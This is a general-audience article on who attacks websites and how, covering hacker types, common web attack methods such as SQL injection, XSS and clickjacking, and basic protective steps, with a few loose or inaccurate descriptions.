Website attacks: Who is trying to hack your website?
On average there are 30,000 website attacks every day according to Sopho Labs (a leading internet security company). Nor is it just adult sites and other sites of dubious provenance that are at risk. Microsoft, Facebook and Twitter have all been hacked. Although website security is fast becoming a global issue; the majority of the 30,000 new websites belong to legitimate small businesses.
Types of Hacker
Traditionally Hackers have fallen into a few broad categories. Lets look at those first. Not all hackers are bad:
Computer Security Professionals – these are the IT security professionals who are paid to test companies internet security and develop defences . The IT security professionals are in an ‘arms race’ with the rest of the hackers.
Now the rest. The following tend to be individuals or very small groups:
Hackers – people who break into networks or computers, or who create computer viruses. The motivation is generally to get paid. We have all heard of hackers who become security professionals,’ poacher’ turned ‘gamekeeper’.
Hackers with scripts – they use borrowed programs and scripts, to deface websites and attack networks, in an attempt to make a reputation for themselves.
Hackers with a cause – the motivation is often religious or political. The hacker may seek to expose some ‘injustice’ or just take revenge.
Spy Hackers – Individuals hired by large corporations to infiltrate the competition and steal commercially sensitive information. The attack may be external or internal. Sometimes the hacker is employed by the target and acts as a mole.
The following tend to be large groups:
Cyber Terrorists – similar to the ‘Hackers with a cause’ but far more dangerous, they are always motivated by religious or political beliefs.
State Sponsored Hackers – Governments around the world use cyber attacks as a weapon.
More recently there has been a rise in cyber crime perpetrated by:
Professional Criminals – these can be individuals or groups who hack into websites purely for fraud or theft of some kind. The Metropolitan Police Service has the largest cybercrime unit in Europe, dubbed FALCON (Fraud and Linked Crime Online).
How they attack your website
In the past malicious code was distributed mainly via email, remember those warnings about untrustworthy email attachments. Today cyber criminals tend to use automated scanning tools to scour the web in search of websites to infect.
The Principle methods include:
DDoS – Distributed Denial of Services, is where a server or website is denied to its users. The hacker takes over the website for his own nefarious reasons. The most common form of DDoS is when a website is flooded with URL requests thereby swamping the server.
Bogus Links – sometimes referred to as Symlinking, this occurs when a user tries to access a file or application through a link on a webpage. Unfortunately the file at the other end of the link is not the file the user expects. The hacker can gain control of the website, depending on the type of link; if the user is expecting to output some information, for example. The hacker can also corrupt and destroy system files and applications.
Clickjacking – also known as a UI Redress Attack, is when a hacker puts layers over the website, without the user being aware. The user clicks the layer thinking they are clicking the website beneath. An example of this attack would be when a user believes they are typing in the password for their bank account, but they are actually typing into an invisible frame controlled by the attacker.
SQL Injection – allows hackers to gain unauthorized access to private data such as, credit card numbers and other financial data. Injection attacks occur when there are flaws in the SQL Database and SQL libraries.
Cross Site Scripting – Cross Site Scripting which is also known as an XSS attack, causes a legitimate request from a website to bypass the validation process. The XSS script will trigger, making users believe that the compromised page of a specific website is legitimate. An example, might be when a user logs in to a website, their session ID is sent to the attacker, allowing the hacker to hijack the user’s current session. The hacker then has the user’s login credentials and can take complete control of the website.
Poor User Authentication – hackers take advantage of poor user authentication. Authentication includes passwords, key management, session IDs, and cookies. Once a website’s authentication has been compromised the hacker can assume the user’s identity.
DNS Cache Poisoning – also referred to as DNS Spoofing. Hackers exploit vulnerabilities in a domain name system (DNS) to divert traffic to a fake website. Once the DNS has been ‘poisoned’ the old cache data is infected and can replicate itself from one DNS server to another spreading the infection.
Various Scams – these are scams rather than hacks, and occur when users are tricked into revealing private data under false pretences. A classic example is the “tech support” scam, whereby the user is contacted by a bogus support engineer and told that he should download some software to correct a supposed problem etc.
Cross Site Request Forgery – this happens when a user is logged into a session and a hacker sends them a forged HTTP request to collect their cookie information. Usually, the cookie remains valid as long as the user or the hacker is logged into the account. This is the reason that websites ask you to log out of your account when you have finished. Sometimes, when the user’s browser session is compromised, the hacker can generate requests to an application which is unable to differentiate between a valid user and a hacker.
Remote Code Execution – this occurs as a result of either server side or client side security weaknesses. Libraries, remote directories on a server that haven’t been monitored; frameworks, and other software modules that run on the basis of authenticated user access; are vulnerable to this form of attack. Applications using these components are constantly under attack via scripts, malware, and small command lines that extract information.
How to Protect your website
Make sure your website is backed up regularly.
Make sure that all the software on your website is fully up to date.
Make sure your website is regularly scanned for any changes, including unexpected changes to file size.
Ensure that your Authentication procedures are robust, use strong passwords and always log out of sessions.
Ensure that sensitive data and traffic is encrypted using SSL.
Be wary about permitting file uploads to your website
Above all be vigilant.